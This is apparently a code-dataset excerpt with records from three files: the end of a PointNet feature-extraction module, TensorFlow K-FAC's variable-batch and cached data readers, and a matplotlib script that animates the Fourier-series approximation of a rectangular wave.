-1, self.n_sample, -1) concat.append(expanded) fused_input_feat = torch.cat(concat, -1) # Prepool_FC, pool, postpool-FC new_feat = fused_input_feat.permute(0, 3, 2, 1) # [B, 10, n_sample, N] new_feat = self.prepool(new_feat) pooled_feat = torch.max(new_feat, 2)[0] # Max pooling (B, C, N) post_feat = self.postpool(pooled_feat) # Post pooling dense layers cluster_feat = post_feat.permute(0, 2, 1) cluster_feat = cluster_feat / torch.norm(cluster_feat, dim=-1, keepdim=True) return cluster_feat # (B, N, C)
en
0.814857
Feature Extraction and Parameter Prediction networks PointNet based Parameter prediction network Args: weights_dim: Number of weights to predict (excluding beta), should be something like [3], or [64, 3], for 3 types of features # Pointnet Returns alpha, beta, and gating_weights (if needed) Args: x: List containing two point clouds, x[0] = src (B, J, 3), x[1] = ref (B, K, 3) Returns: beta, alpha, weightings Parameter Prediction Network with single alpha/beta as parameter. See: Ablation study (Table 4) in paper Returns beta, gating_weights Shared FC part in PointNet before max pooling Linear layers in PointNet after max pooling Args: in_dim: Number of input channels out_dim: Number of output channels. Typically smaller than in_dim Feature extraction Module that extracts hybrid features # Layers # number of channels after concat Forward pass of the feature extraction network Args: xyz: (B, N, 3) normals: (B, N, 3) Returns: cluster features (B, N, C) # Gate and concat # Prepool_FC, pool, postpool-FC # [B, 10, n_sample, N] # Max pooling (B, C, N) # Post pooling dense layers # (B, N, C)
2.58284
3
kfac/python/ops/kfac_utils/data_reader.py
ntselepidis/kfac
179
6628987
<gh_stars>100-1000 # Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Reads variable size batches of data from a data set and stores read data. `VariableBatchReader` reads variable size data from a dataset. `CachedDataReader` on top of `VariableBatchReader` adds functionality to store the read batch for use in the next session.run() call. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # Dependency imports import tensorflow.compat.v1 as tf def _slice_data(stored_data, size): return [data[:size] for data in stored_data] class VariableBatchReader(object): """Read data of varying batch sizes from a data set.""" def __init__(self, dataset, max_batch_size): """Initializes class. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ self._dataset = dataset self._max_batch_size = max_batch_size def __call__(self, batch_size): """Reads `batch_size` data. 
Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ check_size = tf.assert_less_equal( batch_size, tf.convert_to_tensor(self._max_batch_size, dtype=tf.int32), message='Data set read failure, Batch size greater than max allowed.' ) with tf.control_dependencies([check_size]): return _slice_data(self._dataset, batch_size) class CachedDataReader(VariableBatchReader): """Provides functionality to store variable batch size data.""" def __init__(self, dataset, max_batch_size): """Initializes class and creates variables for storing previous batch. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ super(CachedDataReader, self).__init__(dataset, max_batch_size) with tf.variable_scope('cached_data_reader'): self._cached_batch_storage = [ tf.get_variable( name='{}{}'.format('cached_batch_storage_', i), shape=[max_batch_size]+ var.shape.as_list()[1:], dtype=var.dtype, trainable=False, use_resource=True) for i, var in enumerate(self._dataset) ] self._cached_batch_size = tf.get_variable( name='cached_batch_size', shape=(), dtype=tf.int32, trainable=False, use_resource=True) self._cached_batch = _slice_data(self._cached_batch_storage, self._cached_batch_size) def __call__(self, batch_size): """Reads `batch_size` data and stores the read batch. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. 
`batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ sliced_data = super(CachedDataReader, self).__call__(batch_size) # We need to make sure we read the cached batch before we update it! with tf.control_dependencies(self._cached_batch): batch_size_assign_op = self._cached_batch_size.assign(batch_size) data_assign_ops = [ prev[:batch_size].assign(cur) # yes, this actually works for prev, cur in zip(self._cached_batch_storage, sliced_data) ] with tf.control_dependencies(data_assign_ops + [batch_size_assign_op]): return [tf.identity(sdata) for sdata in sliced_data] @property def cached_batch(self): return self._cached_batch
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Reads variable size batches of data from a data set and stores read data. `VariableBatchReader` reads variable size data from a dataset. `CachedDataReader` on top of `VariableBatchReader` adds functionality to store the read batch for use in the next session.run() call. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # Dependency imports import tensorflow.compat.v1 as tf def _slice_data(stored_data, size): return [data[:size] for data in stored_data] class VariableBatchReader(object): """Read data of varying batch sizes from a data set.""" def __init__(self, dataset, max_batch_size): """Initializes class. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ self._dataset = dataset self._max_batch_size = max_batch_size def __call__(self, batch_size): """Reads `batch_size` data. 
Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ check_size = tf.assert_less_equal( batch_size, tf.convert_to_tensor(self._max_batch_size, dtype=tf.int32), message='Data set read failure, Batch size greater than max allowed.' ) with tf.control_dependencies([check_size]): return _slice_data(self._dataset, batch_size) class CachedDataReader(VariableBatchReader): """Provides functionality to store variable batch size data.""" def __init__(self, dataset, max_batch_size): """Initializes class and creates variables for storing previous batch. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ super(CachedDataReader, self).__init__(dataset, max_batch_size) with tf.variable_scope('cached_data_reader'): self._cached_batch_storage = [ tf.get_variable( name='{}{}'.format('cached_batch_storage_', i), shape=[max_batch_size]+ var.shape.as_list()[1:], dtype=var.dtype, trainable=False, use_resource=True) for i, var in enumerate(self._dataset) ] self._cached_batch_size = tf.get_variable( name='cached_batch_size', shape=(), dtype=tf.int32, trainable=False, use_resource=True) self._cached_batch = _slice_data(self._cached_batch_storage, self._cached_batch_size) def __call__(self, batch_size): """Reads `batch_size` data and stores the read batch. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. 
`batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ sliced_data = super(CachedDataReader, self).__call__(batch_size) # We need to make sure we read the cached batch before we update it! with tf.control_dependencies(self._cached_batch): batch_size_assign_op = self._cached_batch_size.assign(batch_size) data_assign_ops = [ prev[:batch_size].assign(cur) # yes, this actually works for prev, cur in zip(self._cached_batch_storage, sliced_data) ] with tf.control_dependencies(data_assign_ops + [batch_size_assign_op]): return [tf.identity(sdata) for sdata in sliced_data] @property def cached_batch(self): return self._cached_batch
en
0.789527
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== Reads variable size batches of data from a data set and stores read data. `VariableBatchReader` reads variable size data from a dataset. `CachedDataReader` on top of `VariableBatchReader` adds functionality to store the read batch for use in the next session.run() call. # Dependency imports Read data of varying batch sizes from a data set. Initializes class. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. Reads `batch_size` data. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. Provides functionality to store variable batch size data. Initializes class and creates variables for storing previous batch. 
Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. Reads `batch_size` data and stores the read batch. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. # We need to make sure we read the cached batch before we update it! # yes, this actually works
3.008675
3
DigitalSignalProcessing/dsp_rectangle_anime.py
tam17aki/speech_process_exercise
74
6628988
<filename>DigitalSignalProcessing/dsp_rectangle_anime.py<gh_stars>10-100 #!/usr/bin/env python """ 音声情報処理 n本ノック !! """ # MIT License # Copyright (C) 2020 by <NAME> # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
# Commentary: # - 矩形波をフーリエ級数近似により作成する # - 近似の様子をアニメーションにより可視化 import math import numpy import numpy.matlib import matplotlib.pyplot as plt import matplotlib.animation as animation # Period [s] PERIOD = 1 # Sampling frequency for plot SAMP_FREQ = 100 # Duration[s] TIME_LEN = 4 * PERIOD # TIME_NUM = math.floor(TIME_LEN * SAMP_FREQ) # 400 # Angle [rad] ANGLE = numpy.linspace(0, 2 * math.pi, SAMP_FREQ) # (100, 1) # Order of Fourier Series ORDER = numpy.array([1, 3, 5, 7, 9]) ORDER_MAT = numpy.matlib.repmat(ORDER, TIME_NUM, 1) # (400, 5) X_MAX = 1.2 Y_MAX = 1.2 X_MIN = -1.2 Y_MIN = -1.2 fig = plt.figure(figsize=[8.0, 8.0]) # 800 x 800 ax1 = fig.add_axes([0.04, 0.85, 0.14, 0.14]) ax1.set_xlim(X_MIN, X_MAX) ax1.set_ylim(Y_MIN, Y_MAX) ax2 = fig.add_axes([0.24, 0.85, 0.74, 0.14]) ax2.set_ylim(Y_MIN, Y_MAX) ax3 = fig.add_axes([0.04, 0.65, 0.14, 0.14]) ax3.set_xlim(X_MIN, X_MAX) ax3.set_ylim(Y_MIN, Y_MAX) ax4 = fig.add_axes([0.24, 0.65, 0.74, 0.14]) ax4.set_ylim(Y_MIN, Y_MAX) ax5 = fig.add_axes([0.04, 0.45, 0.14, 0.14]) ax5.set_xlim(X_MIN, X_MAX) ax5.set_ylim(Y_MIN, Y_MAX) ax6 = fig.add_axes([0.24, 0.45, 0.74, 0.14]) ax6.set_ylim(Y_MIN, Y_MAX) ax7 = fig.add_axes([0.04, 0.25, 0.14, 0.14]) ax7.set_xlim(X_MIN, X_MAX) ax7.set_ylim(Y_MIN, Y_MAX) ax8 = fig.add_axes([0.24, 0.25, 0.74, 0.14]) ax8.set_ylim(Y_MIN, Y_MAX) ax9 = fig.add_axes([0.24, 0.05, 0.74, 0.14]) ax9.set_ylim(Y_MIN, Y_MAX) images = [] for t0 in range(TIME_NUM): # Time [s] time_axis = numpy.arange(0, TIME_NUM).T / SAMP_FREQ # (400, ) time_axis = time_axis[::-1] t = numpy.arange(t0, t0 + TIME_NUM).T / SAMP_FREQ # (400, ) t = numpy.expand_dims(t, axis=1) # (400, 1) t_mat = numpy.matlib.repmat(t, 1, len(ORDER)) # (400, 5) # Fourier coefficients coef = 2 * PERIOD / (math.pi * ORDER) * \ numpy.cos(math.pi * ORDER) # Saw wav # coef = -PERIOD / (math.pi * ORDER) * numpy.cos(math.pi * ORDER) # Saw wave # phase on the circumference phi = 2 * math.pi * ORDER_MAT * t_mat / PERIOD # (400, 5) # unit circle circ = numpy.array([coef 
* numpy.cos(phi[TIME_NUM-1, :]), coef * numpy.sin(phi[TIME_NUM-1, :])]) # (2, 5, 5) sig = numpy.sum(numpy.matlib.repmat( coef, TIME_NUM, 1) * numpy.sin(phi), axis=1) # plot complex plane k=1 im = ax1.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax1.plot([0, circ[0, 0]], [0, circ[1, 0]], linestyle="-", color="b", marker="o", markerfacecolor="b", markersize=4) im += ax1.plot([circ[0, 0], X_MAX], [circ[1, 0], circ[1, 0]], linestyle=":", color="b", marker="o", markersize=4, markerfacecolor="b", linewidth=1) # plot signal k=1 im += ax2.plot(time_axis, coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 2 im += ax3.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax3.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax3.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 1] + circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 2 im += ax4.plot(time_axis, coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 3 im += ax5.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax5.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax5.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax5.plot([0, circ[0, 0]], [0, circ[1, 0]], 
color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 3 im += ax6.plot(time_axis, coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 4 im += ax7.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax7.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax7.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax7.plot(coef[3] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1] + circ[0, 2], coef[3] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1] + circ[1, 2], color="k", linewidth=1.5) im += ax7.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], 
circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal im += ax8.plot(time_axis, coef[3] * numpy.sin(phi[:, 3]) + coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot signal rectwave = -0.5 * numpy.sign(numpy.sin(2 * math.pi * t / PERIOD)) im += ax9.plot(time_axis, rectwave, linestyle="-", color="b", linewidth=1.5) images.append(im) ANIME = animation.ArtistAnimation(fig, images, interval=40) ANIME.save("rectangle_anime.mp4", writer="ffmpeg", dpi=300)
<filename>DigitalSignalProcessing/dsp_rectangle_anime.py<gh_stars>10-100 #!/usr/bin/env python """ 音声情報処理 n本ノック !! """ # MIT License # Copyright (C) 2020 by <NAME> # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
# Commentary: # - 矩形波をフーリエ級数近似により作成する # - 近似の様子をアニメーションにより可視化 import math import numpy import numpy.matlib import matplotlib.pyplot as plt import matplotlib.animation as animation # Period [s] PERIOD = 1 # Sampling frequency for plot SAMP_FREQ = 100 # Duration[s] TIME_LEN = 4 * PERIOD # TIME_NUM = math.floor(TIME_LEN * SAMP_FREQ) # 400 # Angle [rad] ANGLE = numpy.linspace(0, 2 * math.pi, SAMP_FREQ) # (100, 1) # Order of Fourier Series ORDER = numpy.array([1, 3, 5, 7, 9]) ORDER_MAT = numpy.matlib.repmat(ORDER, TIME_NUM, 1) # (400, 5) X_MAX = 1.2 Y_MAX = 1.2 X_MIN = -1.2 Y_MIN = -1.2 fig = plt.figure(figsize=[8.0, 8.0]) # 800 x 800 ax1 = fig.add_axes([0.04, 0.85, 0.14, 0.14]) ax1.set_xlim(X_MIN, X_MAX) ax1.set_ylim(Y_MIN, Y_MAX) ax2 = fig.add_axes([0.24, 0.85, 0.74, 0.14]) ax2.set_ylim(Y_MIN, Y_MAX) ax3 = fig.add_axes([0.04, 0.65, 0.14, 0.14]) ax3.set_xlim(X_MIN, X_MAX) ax3.set_ylim(Y_MIN, Y_MAX) ax4 = fig.add_axes([0.24, 0.65, 0.74, 0.14]) ax4.set_ylim(Y_MIN, Y_MAX) ax5 = fig.add_axes([0.04, 0.45, 0.14, 0.14]) ax5.set_xlim(X_MIN, X_MAX) ax5.set_ylim(Y_MIN, Y_MAX) ax6 = fig.add_axes([0.24, 0.45, 0.74, 0.14]) ax6.set_ylim(Y_MIN, Y_MAX) ax7 = fig.add_axes([0.04, 0.25, 0.14, 0.14]) ax7.set_xlim(X_MIN, X_MAX) ax7.set_ylim(Y_MIN, Y_MAX) ax8 = fig.add_axes([0.24, 0.25, 0.74, 0.14]) ax8.set_ylim(Y_MIN, Y_MAX) ax9 = fig.add_axes([0.24, 0.05, 0.74, 0.14]) ax9.set_ylim(Y_MIN, Y_MAX) images = [] for t0 in range(TIME_NUM): # Time [s] time_axis = numpy.arange(0, TIME_NUM).T / SAMP_FREQ # (400, ) time_axis = time_axis[::-1] t = numpy.arange(t0, t0 + TIME_NUM).T / SAMP_FREQ # (400, ) t = numpy.expand_dims(t, axis=1) # (400, 1) t_mat = numpy.matlib.repmat(t, 1, len(ORDER)) # (400, 5) # Fourier coefficients coef = 2 * PERIOD / (math.pi * ORDER) * \ numpy.cos(math.pi * ORDER) # Saw wav # coef = -PERIOD / (math.pi * ORDER) * numpy.cos(math.pi * ORDER) # Saw wave # phase on the circumference phi = 2 * math.pi * ORDER_MAT * t_mat / PERIOD # (400, 5) # unit circle circ = numpy.array([coef 
* numpy.cos(phi[TIME_NUM-1, :]), coef * numpy.sin(phi[TIME_NUM-1, :])]) # (2, 5, 5) sig = numpy.sum(numpy.matlib.repmat( coef, TIME_NUM, 1) * numpy.sin(phi), axis=1) # plot complex plane k=1 im = ax1.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax1.plot([0, circ[0, 0]], [0, circ[1, 0]], linestyle="-", color="b", marker="o", markerfacecolor="b", markersize=4) im += ax1.plot([circ[0, 0], X_MAX], [circ[1, 0], circ[1, 0]], linestyle=":", color="b", marker="o", markersize=4, markerfacecolor="b", linewidth=1) # plot signal k=1 im += ax2.plot(time_axis, coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 2 im += ax3.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax3.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax3.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax3.plot([circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 1] + circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 2 im += ax4.plot(time_axis, coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 3 im += ax5.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax5.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax5.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax5.plot([0, circ[0, 0]], [0, circ[1, 0]], 
color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax5.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal k = 3 im += ax6.plot(time_axis, coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot complex plane k = 4 im += ax7.plot(coef[0] * numpy.cos(ANGLE), coef[0] * numpy.sin(ANGLE), color="k", linewidth=1.5) im += ax7.plot(coef[1] * numpy.cos(ANGLE) + circ[0, 0], coef[1] * numpy.sin(ANGLE) + circ[1, 0], color="k", linewidth=1.5) im += ax7.plot(coef[2] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1], coef[2] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1], color="k", linewidth=1.5) im += ax7.plot(coef[3] * numpy.cos(ANGLE) + circ[0, 0] + circ[0, 1] + circ[0, 2], coef[3] * numpy.sin(ANGLE) + circ[1, 0] + circ[1, 1] + circ[1, 2], color="k", linewidth=1.5) im += ax7.plot([0, circ[0, 0]], [0, circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 0], circ[0, 1] + circ[0, 0]], [circ[1, 0], circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 1] + circ[0, 0], circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 1] + circ[1, 0], circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 2] + circ[0, 1] + circ[0, 0], 
circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0]], [circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle="-", marker="o", markerfacecolor="b", markersize=4) im += ax7.plot([circ[0, 3] + circ[0, 2] + circ[0, 1] + circ[0, 0], X_MAX], [circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0], circ[1, 3] + circ[1, 2] + circ[1, 1] + circ[1, 0]], color="b", linestyle=":", marker="o", markerfacecolor="b", linewidth=1, markersize=4) # plot signal im += ax8.plot(time_axis, coef[3] * numpy.sin(phi[:, 3]) + coef[2] * numpy.sin(phi[:, 2]) + coef[1] * numpy.sin(phi[:, 1]) + coef[0] * numpy.sin(phi[:, 0]), linestyle="-", color="b", linewidth=1.5) # plot signal rectwave = -0.5 * numpy.sign(numpy.sin(2 * math.pi * t / PERIOD)) im += ax9.plot(time_axis, rectwave, linestyle="-", color="b", linewidth=1.5) images.append(im) ANIME = animation.ArtistAnimation(fig, images, interval=40) ANIME.save("rectangle_anime.mp4", writer="ffmpeg", dpi=300)
en
0.687849
